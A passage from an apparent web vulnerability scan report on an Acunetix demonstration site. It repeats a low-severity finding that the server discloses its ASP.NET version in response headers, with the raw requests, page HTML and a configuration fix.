href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        6. GET http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13914
          
          
          Response body (13914 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9dpx0P1QE7KvkQnKR4Ij212SQ8lw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a>
          						<DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        7. GET http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
